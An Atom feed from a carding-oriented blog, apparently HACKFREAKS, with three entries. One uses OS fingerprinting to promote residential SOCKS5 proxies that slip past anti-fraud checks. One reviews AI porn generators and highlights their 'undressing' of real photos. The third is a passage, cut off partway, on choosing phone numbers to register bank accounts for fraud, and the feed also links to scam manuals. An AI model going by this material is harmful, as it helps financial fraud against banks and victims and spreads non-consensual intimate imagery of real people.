<?xml version="1.0" encoding="utf-8" ?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:tt="http://teletype.in/" xmlns:opensearch="http://a9.com/-/spec/opensearch/1.1/"><title>HACKFREAKS</title><subtitle>PART OF HACKFREAKS OFFICIAL IN TELEGRAM</subtitle><author><name>HACKFREAKS</name></author><id>https://teletype.in/atom/hackfreaks</id><link rel="self" type="application/atom+xml" href="https://teletype.in/atom/hackfreaks?offset=0"></link><link rel="alternate" type="text/html" href="https://teletype.in/@hackfreaks?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hackfreaks"></link><link rel="next" type="application/rss+xml" href="https://teletype.in/atom/hackfreaks?offset=10"></link><link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></link><updated>2026-04-17T19:24:29.627Z</updated><entry><id>hackfreaks:sJvwIPFVqyV</id><link rel="alternate" type="text/html" href="https://teletype.in/@hackfreaks/sJvwIPFVqyV?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hackfreaks"></link><title>The Critical Role of OS Fingerprints in SOCKS5 Proxies and Anti-Fraud Detection in carding and fraud.</title><published>2024-09-08T09:33:24.757Z</published><updated>2024-09-08T09:33:24.757Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img1.teletype.in/files/c2/e6/c2e6b3a0-a203-4d8f-b6a2-08f20c830c97.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://telegra.ph/file/fcea9d5988fafb056258b.jpg&quot;&gt;In the world of online privacy and anonymity, SOCKS5 proxies are a powerful tool for masking your real IP address. However, the effectiveness of a proxy goes beyond just IP masking—it's also about how your traffic is perceived by the destination server. A key factor in this perception is the OS fingerprint, which can make or break the authenticity of your browsing experience.</summary><content type="html">
  &lt;p id=&quot;wrUB&quot;&gt;In the world of online privacy and anonymity, SOCKS5 proxies are a powerful tool for masking your real IP address. However, the effectiveness of a proxy goes beyond just IP masking—it&amp;#x27;s also about how your traffic is perceived by the destination server. A key factor in this perception is the OS fingerprint, which can make or break the authenticity of your browsing experience.&lt;/p&gt;
  &lt;h3 id=&quot;What-is-an-OS-Fingerprint?&quot;&gt;What is an OS Fingerprint?&lt;/h3&gt;
  &lt;p id=&quot;wTYL&quot;&gt;An OS fingerprint is a unique identifier that reveals the operating system (OS) of the device you&amp;#x27;re connecting from. It is determined by analyzing specific patterns in the network traffic, such as TCP/IP stack behaviour, packet headers, and the order of specific flags within those headers. Each operating system, whether it&amp;#x27;s Windows, Linux, macOS, or others, implements these protocols in slightly different ways, which can be used to identify the OS.&lt;/p&gt;
  &lt;p id=&quot;Yiax&quot;&gt;For instance, the Time To Live (TTL) value in an IP packet, the order of TCP options, or the response to certain network probes can vary depending on the operating system. These subtle differences are what create an OS fingerprint. Anti-fraud systems use these fingerprints to determine if the traffic is coming from a real user or potentially suspicious sources.&lt;/p&gt;
  &lt;h3 id=&quot;How-OS-Fingerprints-Work-in-Practice&quot;&gt;How OS Fingerprints Work in Practice&lt;/h3&gt;
  &lt;p id=&quot;K7Q6&quot;&gt;When you connect to a website, the server doesn’t just see your IP address; it also analyzes the network traffic to identify the OS you’re using. This process involves several steps:&lt;/p&gt;
  &lt;ol id=&quot;xL57&quot;&gt;
    &lt;li id=&quot;W4BJ&quot;&gt;&lt;strong&gt;Packet Inspection:&lt;/strong&gt; The server inspects the headers of incoming packets. Key fields such as TTL, window size, and TCP options are scrutinized.&lt;/li&gt;
    &lt;li id=&quot;x7On&quot;&gt;&lt;strong&gt;Pattern Matching:&lt;/strong&gt; The server compares these packet characteristics to a database of known OS fingerprints. This database is built by analyzing traffic from known operating systems and recording their unique characteristics.&lt;/li&gt;
    &lt;li id=&quot;H2TY&quot;&gt;&lt;strong&gt;OS Identification:&lt;/strong&gt; Based on this comparison, the server determines the most likely OS you’re using. This information is used to decide whether your connection is legitimate or if it warrants further scrutiny.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;h3 id=&quot;Anti-Fraud-Systems-and-OS-Fingerprints&quot;&gt;Anti-Fraud Systems and OS Fingerprints&lt;/h3&gt;
  &lt;p id=&quot;vt0V&quot;&gt;Anti-fraud systems use OS fingerprints as part of a broader strategy to detect and block malicious activity. These systems are designed to identify patterns that are unusual or inconsistent with typical user behaviour. For example:&lt;/p&gt;
  &lt;ul id=&quot;P4dW&quot;&gt;
    &lt;li id=&quot;9UMO&quot;&gt;&lt;strong&gt;Mismatch Detection:&lt;/strong&gt; If an IP address is associated with a residential ISP, but the OS fingerprint suggests it&amp;#x27;s coming from a Linux server (which is uncommon for residential users), this might raise a red flag. The system may suspect that the traffic is coming from a bot or a proxy server rather than a real user.&lt;/li&gt;
    &lt;li id=&quot;GNCk&quot;&gt;&lt;strong&gt;Behavioral Analysis:&lt;/strong&gt; Anti-fraud systems also analyze the consistency of OS u across sessions. If a user’s OS fingerprint changes frequently (e.g., from Windows to Linux and back), it could indicate the use of multiple proxies or spoofing techniques, triggering additional verification steps like CAPTCHAs or multi-factor authentication.&lt;/li&gt;
    &lt;li id=&quot;835j&quot;&gt;&lt;strong&gt;Traffic Profiling:&lt;/strong&gt; By combining OS fingerprints with other data points (such as browser fingerprints, geolocation, and usage patterns), anti-fraud systems can build a detailed profile of the user. Any deviations from this profile can lead to traffic being flagged as suspicious.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3 id=&quot;The-Difference-Between-Windows-and-Linux-OS-Fingerprints&quot;&gt;The Difference Between Windows and Linux OS Fingerprints&lt;/h3&gt;
  &lt;p id=&quot;fYv1&quot;&gt;Most SOCKS5 proxies in the market today run on IoT devices or servers that use Linux-based operating systems. While Linux is efficient, it presents a distinctive fingerprint that is not typical of residential user devices. This can be a disadvantage in scenarios where authenticity is critical.&lt;/p&gt;
  &lt;ul id=&quot;m2jd&quot;&gt;
    &lt;li id=&quot;LZD2&quot;&gt;&lt;strong&gt;Linux Fingerprints:&lt;/strong&gt; Linux-based proxies are often detected due to their distinctive network behaviour. IoT devices like routers or switches, which are often used to host these proxies, introduce additional quirks to the traffic. These devices do not typically behave like a standard home computer, making their traffic more likely to be flagged by anti-fraud systems.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure id=&quot;EbOQ&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/fcea9d5988fafb056258b.jpg&quot; width=&quot;1280&quot; /&gt;
    &lt;figcaption&gt;Competitor&amp;#x27;s Proxies (Source browserleaks.com)&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;ul id=&quot;kmhT&quot;&gt;
    &lt;li id=&quot;2QMh&quot;&gt;&lt;strong&gt;Windows Fingerprints:&lt;/strong&gt; In contrast, our SOCKS5 proxies are hosted on residential Windows computers. Since most home users run Windows, these proxies generate OS fingerprints that closely match the expected traffic patterns of legitimate residential users. This means that your traffic appears much more authentic, reducing the risk of detection or blocking.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure id=&quot;7POW&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://telegra.ph/file/e0d87538cf9b8286f853d.jpg&quot; width=&quot;1280&quot; /&gt;
    &lt;figcaption&gt;(Source pixelscan.net)&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;Why-Windows-Based-SOCKS5-Proxies-Offer-Superior-Anonymity&quot;&gt;Why Windows-Based SOCKS5 Proxies Offer Superior Anonymity&lt;/h3&gt;
  &lt;p id=&quot;p1Eg&quot;&gt;Using a SOCKS5 proxy with a Windows OS fingerprint offers several advantages:&lt;/p&gt;
  &lt;ol id=&quot;TPnW&quot;&gt;
    &lt;li id=&quot;2cx5&quot;&gt;&lt;strong&gt;Authenticity:&lt;/strong&gt; Since most residential users are on Windows, using a Windows-based proxy makes your traffic look like it’s coming from a genuine user, not a server or bot.&lt;/li&gt;
    &lt;li id=&quot;C7oj&quot;&gt;&lt;strong&gt;Lower Detection Risk:&lt;/strong&gt; Anti-fraud systems are less likely to flag your traffic as suspicious because the OS fingerprint matches that of a typical residential user.&lt;/li&gt;
    &lt;li id=&quot;ql4n&quot;&gt;&lt;strong&gt;Improved Access:&lt;/strong&gt; With a Windows fingerprint, you&amp;#x27;re less likely to encounter CAPTCHAs, account bans, or other forms of verification that can disrupt your browsing experience.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;h3 id=&quot;Conclusion&quot;&gt;Conclusion&lt;/h3&gt;
  &lt;p id=&quot;9NJW&quot;&gt;In the competitive world of online privacy, the choice of SOCKS5 proxy is crucial. While many providers use Linux-based IoT devices for cost efficiency, the trade-off is clear: less authentic traffic that’s more easily detected by anti-fraud systems. Our Windows-based SOCKS5 proxies, on the other hand, offer the authenticity and reliability you need to ensure your traffic passes unnoticed.&lt;/p&gt;
  &lt;p id=&quot;Fout&quot;&gt;If you’re serious about maintaining your anonymity and bypassing detection, choosing a proxy with a Windows OS fingerprint is the smart move. Don’t let inferior proxies expose you to unnecessary risks—opt for the authenticity and security of our Windows-based SOCKS5 proxies.&lt;/p&gt;

</content></entry><entry><id>hackfreaks:Om5_NmdLtVd</id><link rel="alternate" type="text/html" href="https://teletype.in/@hackfreaks/Om5_NmdLtVd?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hackfreaks"></link><title>Best Ai engines for Creating 18+ content and Money-Making Strategies.</title><published>2024-02-04T13:17:03.234Z</published><updated>2024-02-04T13:17:03.234Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img1.teletype.in/files/80/06/8006e519-f8a5-4f2b-8194-bb066f056f33.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image24-1024x445.png&amp;nocache=1&quot;&gt;Pretend you're a pirate sailing on a cool ship, always looking for islands with lots of treasures like gold coins. Well, in the online world, people also look for ways to make a lot of money, and there's a new tool called AI.</summary><content type="html">
  &lt;figure id=&quot;SzKq&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/69/67/6967f238-631f-4095-b8c8-43d2c11bf930.jpeg&quot; width=&quot;2560&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;bVxv&quot;&gt;Pretend you&amp;#x27;re a pirate sailing on a cool ship, always looking for islands with lots of treasures like gold coins. Well, in the online world, people also look for ways to make a lot of money, and there&amp;#x27;s a new tool called AI.&lt;/p&gt;
  &lt;blockquote id=&quot;tUCi&quot;&gt;It&amp;#x27;s like a magic tool that can create stuff for adults, like stories or pictures. Imagine it&amp;#x27;s like finding a treasure chest full of goodies! People who know how to use this tool can make lots of money, especially when dealing with dating and adult stuff.&amp;quot;&lt;/blockquote&gt;
  &lt;p id=&quot;l6HP&quot;&gt;&lt;strong&gt;&lt;a href=&quot;https://t.me/+9ZtRfQpkD84zNzdh&quot; target=&quot;_blank&quot;&gt;HACKFREAKS OFFICIAL&lt;/a&gt; - LIST OF CARDING AND MONEY RESOURCES, CHANNEL WITH TOPICS, CHAT FOR COMMUNICATION, BOARD WITH TRUST SELLERS AND MARKETPLACE FOR THEIR ADVERTISING.&lt;br /&gt;&lt;/strong&gt;&lt;br /&gt;Below are several options for neural networks that generate such content.&lt;/p&gt;
  &lt;h2 id=&quot;CCCE&quot;&gt;Top neural networks for creating content 18+&lt;/h2&gt;
  &lt;p id=&quot;HQlB&quot;&gt;Without further delay, let’s move on to a brief overview of each neural network for creating content for adults.&lt;/p&gt;
  &lt;h3 id=&quot;zAvY&quot;&gt;&lt;a href=&quot;https://made.porn/&quot; target=&quot;_blank&quot;&gt;MadePorn&lt;/a&gt;&lt;/h3&gt;
  &lt;p id=&quot;K8eU&quot;&gt;The neural network gives users a huge selection of settings for generating images. All races and types of fetish, emotions and content formats for an adult audience are represented here.&lt;/p&gt;
  &lt;figure id=&quot;79qm&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image24-1024x445.png&amp;nocache=1&quot; width=&quot;1024&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;aKgp&quot;&gt;The &lt;a href=&quot;https://t.me/+9ZtRfQpkD84zNzdh&quot; target=&quot;_blank&quot;&gt;service&lt;/a&gt; allows you to generate images with certain settings for free. But, for example, for creating cartoon versions or 3D, it is available through a paid subscription.&lt;/p&gt;
  &lt;figure id=&quot;2zw1&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image15-1024x414.png&amp;nocache=1&quot; width=&quot;1024&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;o6nE&quot;&gt;The cost of a paid subscription for 30 days is 16.93 euros.&lt;/p&gt;
  &lt;p id=&quot;u4T4&quot;&gt;Also, the paid version gives access to generating images within 5-20 seconds and removes the limit on the number of generations per hour.&lt;/p&gt;
  &lt;figure id=&quot;25KD&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image16.png&amp;nocache=1&quot; width=&quot;971&quot; /&gt;
  &lt;/figure&gt;
  &lt;h2 id=&quot;jhDt&quot;&gt;&lt;a href=&quot;https://pornworks.ai/en/&quot; target=&quot;_blank&quot;&gt;PornworksAI&lt;/a&gt;&lt;/h2&gt;
  &lt;figure id=&quot;sSKt&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image23-1024x462.png&amp;nocache=1&quot; width=&quot;1024&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;nxgf&quot;&gt;A neural network that is trained on the appearance of real actresses. Generates images based on items entered in text format. &lt;/p&gt;
  &lt;figure id=&quot;44le&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image22.png&amp;nocache=1&quot; width=&quot;1015&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;N9gO&quot;&gt;There is also a function of “undressing” real photos.&lt;/p&gt;
  &lt;figure id=&quot;aPv8&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image25-1024x474.png&amp;nocache=1&quot; width=&quot;1024&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;R9o2&quot;&gt;Monthly subscription prices &lt;a href=&quot;https://t.me/+9ZtRfQpkD84zNzdh&quot; target=&quot;_blank&quot;&gt;range&lt;/a&gt; from €2.99 to €14.99. The function of undressing real photos is available in the most expensive version. When paying for a subscription for 3 months and a year, you can save 20% and 60%, respectively. You can even top up with a MIR card.&lt;/p&gt;
  &lt;figure id=&quot;Ov6y&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image19-1024x536.png&amp;nocache=1&quot; width=&quot;1024&quot; /&gt;
  &lt;/figure&gt;
  &lt;h2 id=&quot;jjMk&quot;&gt;&lt;a href=&quot;https://pornx.ai/search&quot; target=&quot;_blank&quot;&gt;PornX&lt;/a&gt;&lt;/h2&gt;
  &lt;figure id=&quot;isVA&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image17-1024x463.png&amp;nocache=1&quot; width=&quot;1024&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ii7P&quot;&gt;A neural network with a large set of filters, including race, clothing items, locations, etc. There is also a function for “undressing” real photos and generating short videos using tips or filters.&lt;/p&gt;
  &lt;figure id=&quot;3Qut&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image11-1024x453.png&amp;nocache=1&quot; width=&quot;1024&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;tmXW&quot;&gt;Monthly premium subscription: $10.35-$17.55. By subscribing for a year, you can save up to 20% of the cost.&lt;/p&gt;
  &lt;figure id=&quot;bRl7&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image8-4-1024x493.png&amp;nocache=1&quot; width=&quot;1024&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;k78O&quot;&gt;&lt;a href=&quot;https://pornwizard.ai/&quot; target=&quot;_blank&quot;&gt;PornWizardAI&lt;/a&gt;&lt;/h3&gt;
  &lt;p id=&quot;4XyA&quot;&gt;A neural network with a huge number of settings and parameters for generating images for adults. If you like this content please subs for our &lt;a href=&quot;https://t.me/+9ZtRfQpkD84zNzdh&quot; target=&quot;_blank&quot;&gt;channel&lt;/a&gt; for more interesting article like this&lt;/p&gt;
  &lt;figure id=&quot;xc7j&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image5-7-1024x476.png&amp;nocache=1&quot; width=&quot;1024&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ghnM&quot;&gt;Most of the functionality is aimed at audiences who prefer various types of fetish. For example, this neuron can definitely satisfy most of the requests of fans of 18+ content in the fantasy style.&lt;/p&gt;
  &lt;p id=&quot;PRhy&quot;&gt;You can get access to faster generation and images with improved detail by subscribing for a month for $9.&lt;/p&gt;
  &lt;p id=&quot;tD5q&quot;&gt;Also, as a nice bonus, the network provides an affiliate program with the ability to withdraw commissions in crypto.&lt;/p&gt;
  &lt;figure id=&quot;68ez&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image18-1024x492.png&amp;nocache=1&quot; width=&quot;1024&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;oXy2&quot;&gt;&lt;a href=&quot;https://pornmake.ai/&quot; target=&quot;_blank&quot;&gt;PornMake AI&lt;/a&gt;&lt;/h3&gt;
  &lt;p id=&quot;cv7v&quot;&gt;A neuron that allows you to generate static square images for free, taking into account an extensive set of settings.&lt;/p&gt;
  &lt;figure id=&quot;YL8a&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image2-4-1024x468.png&amp;nocache=1&quot; width=&quot;1024&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;fgN7&quot;&gt;You can create a character by adjusting the parameters of race, gender, age, realism, hair color and type, face, build and size of individual parts of the body, as well as clothing, actions, location and background. The paid version also offers custom pose settings and cosplay of characters from games, fantasy and anime.&lt;/p&gt;
  &lt;figure id=&quot;JpSA&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image14-1024x494.png&amp;nocache=1&quot; width=&quot;1024&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;MZsM&quot;&gt;The cost of a premium subscription at the time of writing remains unknown due to the deletion of the account on the Patreon platform, through which the creators of the service collected donations.&lt;/p&gt;
  &lt;p id=&quot;TEHh&quot;&gt;&lt;/p&gt;
  &lt;h3 id=&quot;cXaI&quot;&gt;&lt;a href=&quot;https://www.unstability.ai/&quot; target=&quot;_blank&quot;&gt;Unstable Diffusion&lt;/a&gt;&lt;/h3&gt;
  &lt;p id=&quot;EBwU&quot;&gt;A version of the Stable Diffusion neural network for creating more piquant content.&lt;/p&gt;
  &lt;figure id=&quot;S4pf&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image3-7-1024x460.png&amp;nocache=1&quot; width=&quot;1024&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;hUxP&quot;&gt;Like its ancestor, the neuron operates on Discord and generates images for adults based on text messages.&lt;/p&gt;
  &lt;figure id=&quot;xEMt&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image13-1024x460.png&amp;nocache=1&quot; width=&quot;1024&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;nlBs&quot;&gt;The neuron has a credit system. In the free version, the balance is updated once every 24 hours. In the paid version, the number of credits and the availability of additional features depends on the selected subscription option.&lt;/p&gt;
  &lt;p id=&quot;Ow0d&quot;&gt;Premium subscriptions range from $14.99 to $59.99 per month.&lt;/p&gt;
  &lt;figure id=&quot;whCj&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image1-6-1024x522.png&amp;nocache=1&quot; width=&quot;1024&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;tBtQ&quot;&gt;&lt;a href=&quot;https://pornjourney.ai/&quot; target=&quot;_blank&quot;&gt;PornJourney&lt;/a&gt;&lt;/h3&gt;
  &lt;p id=&quot;BxYO&quot;&gt;Generates both static images and short videos.&lt;/p&gt;
  &lt;figure id=&quot;HAd3&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image9-1-1024x466.png&amp;nocache=1&quot; width=&quot;1024&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;78ZP&quot;&gt;Generation is based on a system of ready-made filters. In addition to videos and realistic pictures, a hentai version is available with a large selection of different settings and filters.&lt;/p&gt;
  &lt;figure id=&quot;buZ0&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image21-1024x466.png&amp;nocache=1&quot; width=&quot;1024&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;qtEW&quot;&gt;In the premium version, clothing editing and “undressing” are available.&lt;/p&gt;
  &lt;p id=&quot;Z7L7&quot;&gt;The monthly subscription costs $14.99. If you sign up for a year, the premium will cost $89.99.&lt;/p&gt;
  &lt;figure id=&quot;dwA7&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image20.png&amp;nocache=1&quot; width=&quot;649&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;B4se&quot;&gt;&lt;a href=&quot;https://pornpen.ai/&quot; target=&quot;_blank&quot;&gt;PornPen AI&lt;/a&gt;&lt;/h3&gt;
  &lt;p id=&quot;U7Bm&quot;&gt;One of the very first porn neural networks. During its existence, the developers have added many new functions and improved the technical capabilities of content generation. In the settings you can even add parameters such as the presence of accessories and type of clothing.&lt;/p&gt;
  &lt;figure id=&quot;huyy&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image10-1-1024x442.png&amp;nocache=1&quot; width=&quot;1024&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;XwYg&quot;&gt;In the free version, generating one image can take up to 5 minutes.&lt;/p&gt;
  &lt;p id=&quot;j65U&quot;&gt;To gain access to creating gifs, HD images in uncropped format, smart editing and obtaining the right to use for commercial purposes, you must subscribe to a paid subscription.&lt;/p&gt;
  &lt;figure id=&quot;jZTX&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image4-8.png&amp;nocache=1&quot; width=&quot;955&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;TwUQ&quot;&gt;A month of the Pro version costs only $14.99.&lt;/p&gt;
  &lt;h2 id=&quot;jARo&quot;&gt;&lt;a href=&quot;https://sexy.ai/&quot; target=&quot;_blank&quot;&gt;Sexy AI&lt;/a&gt;&lt;/h2&gt;
  &lt;figure id=&quot;yWMu&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://piratecpa.net/wp-content/webpc-passthru.php?src=https://piratecpa.net/wp-content/uploads/2024/01/image6-4-1024x335.png&amp;nocache=1&quot; width=&quot;1024&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;taY2&quot;&gt;A simple neural network based on text queries. Generates images depending on the detail of the description. In the paid version, generation of short videos is also available.&lt;/p&gt;
  &lt;p id=&quot;ycxb&quot;&gt;Paid subscription is paid through the boosty service. The cost of use for a month is $15.5.&lt;/p&gt;
  &lt;h2 id=&quot;rQby&quot;&gt;Bottom line&lt;/h2&gt;
  &lt;p id=&quot;SFcb&quot;&gt;Our brief review of neural networks for creating adult content shows that using this tool is becoming easier every day. Many services generate images that are quite realistic for even the most sophisticated audience. And the affiliate can recoup the cost of the paid version from the very first lead attracted by such AI creative.&lt;/p&gt;
  &lt;h2 id=&quot;hKMX&quot;&gt;RELATED MANUALS&lt;/h2&gt;
  &lt;p id=&quot;4mjv&quot;&gt;&lt;a href=&quot;https://teletype.in/@hackfreaks_money/EkxXvxFPLUq&quot; target=&quot;_blank&quot;&gt;&lt;br /&gt;FANSLY 2023 PRIVATE MANUAL&lt;br /&gt;&lt;/a&gt;&lt;a href=&quot;https://teletype.in/@hackfreaks/f1Nlf9PKFIN&quot; target=&quot;_blank&quot;&gt;MAKE MONEY ON TINDER&lt;br /&gt;&lt;/a&gt;&lt;a href=&quot;https://teletype.in/@hackfreaks/8XZeMF-EWN3&quot; target=&quot;_blank&quot;&gt;(SCAM)Making a realistic female voice in real time.&lt;br /&gt;&lt;/a&gt;&lt;a href=&quot;https://teletype.in/@hackfreaks/D7bZLbD4AHJ&quot; target=&quot;_blank&quot;&gt;Grey Dating scam Manual leak | Rob the Turks.&lt;br /&gt;&lt;/a&gt;&lt;a href=&quot;https://teletype.in/@hackfreaks/rkosSrHEGRk&quot; target=&quot;_blank&quot;&gt;Earnings on Pornhub with someone&amp;#x27;s else video.&lt;/a&gt;&lt;/p&gt;

</content></entry><entry><id>hackfreaks:JXFXvqNUGAP</id><link rel="alternate" type="text/html" href="https://teletype.in/@hackfreaks/JXFXvqNUGAP?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hackfreaks"></link><title>SIM cards - What does antifraud see when registering in banks or fraud ?</title><published>2024-01-16T14:20:56.576Z</published><updated>2024-01-16T14:20:56.576Z</updated><summary type="html">Hello my little freaks, what can I say? Let me start with the fact that it’s 2024, and just like a year earlier, I receive messages from subscribers about the fact that they don’t give a damn about Google Voice and similar services. And if when working in EU countries as a whole (in most cases), no one really gives a damn about what number you register the bank for and you can use the well-known Hushed, then when working with the same system there are a hell of a lot more of these nuances, precisely for the reason that already For many years, our, so to speak, colleagues (and not only them, but also traffickers, and simply registrars of varying degrees of salting with different levels of experience), used GV and other voips to register...</summary><content type="html">
  &lt;p id=&quot;rNNo&quot;&gt;&lt;em&gt;Hello my little freaks, what can I say? Let me start with the fact that it’s 2024, and just like a year earlier, I receive messages from subscribers about the fact that they don’t give a damn about Google Voice and similar services. And if when working in EU countries as a whole (in most cases), no one really gives a damn about what number you register the bank for and you can use the well-known Hushed, then when working with the same system there are a hell of a lot more of these nuances, precisely for the reason that already For many years, our, so to speak, colleagues (and not only them, but also traffickers, and simply registrars  &lt;s&gt;of varying degrees of salting&lt;/s&gt; with different levels of experience), used GV and other voips to register acceptance banks. In short, there’s no point in ranting, let’s move on to the harsh theory.&lt;/em&gt;&lt;/p&gt;
  &lt;p id=&quot;jitg&quot;&gt;&lt;em&gt;Well, at the beginning, it’s worth making an amendment that SIM cards are only a small part of successful registration, but sometimes no less important. Different banks pay attention to completely different points - some are interested in the state/area code, others are interested in the presence of the number in the Kyrgyz Republic, technically antifraud providers can even check who the number is registered to if the operator shares this information (but at the moment this practice is more likely exception rather than the rule).&lt;/em&gt;&lt;/p&gt;
  &lt;h3 id=&quot;y74v&quot;&gt;&lt;em&gt;1. Checking the number using credit bureaus/TLO services.&lt;/em&gt;&lt;/h3&gt;
  &lt;p id=&quot;o6ub&quot;&gt;Some banks check information with credit bureaus when you register as a bank. They make a request, the so-called soft inquiry, to check for friezes, quick credit and fraud alerts, during which they also receive data on numbers previously used to provide any financial services to the holder. &lt;br /&gt;To put it simply, complex banks may even require an SMS to the number from the report if it differs from the one specified during registration. I won’t talk about ways to add in the public &lt;s&gt;because I’m a greedy guy,&lt;/s&gt; but of course I can give general recommendations. A number added to the bank recently is, as a rule, not a trust number and, on the contrary, can cause fraud, for example, when registering credit cards. and if you like what you are reading please hit a like and subscribe to our hackfreaks official channel. Back on topic. Also, for some offices, the Primary Number is important, which can only be changed through direct contact with the office, and not through inquiry. Well, if you take those banks that require an SMS to a number from the country, then you need to wait quite a long time for it to be reflected during their registration. As for TLO, information from which financial offices request - this is something like bg services, only not for individuals, but for organizations whose activities may require searching for information about people. They provide much more information, but registering to use their services is unrealistic, so to our joy, in some cases they use the same algorithms as well-known bg services, which means you can rely on information from these same bg services. &lt;br 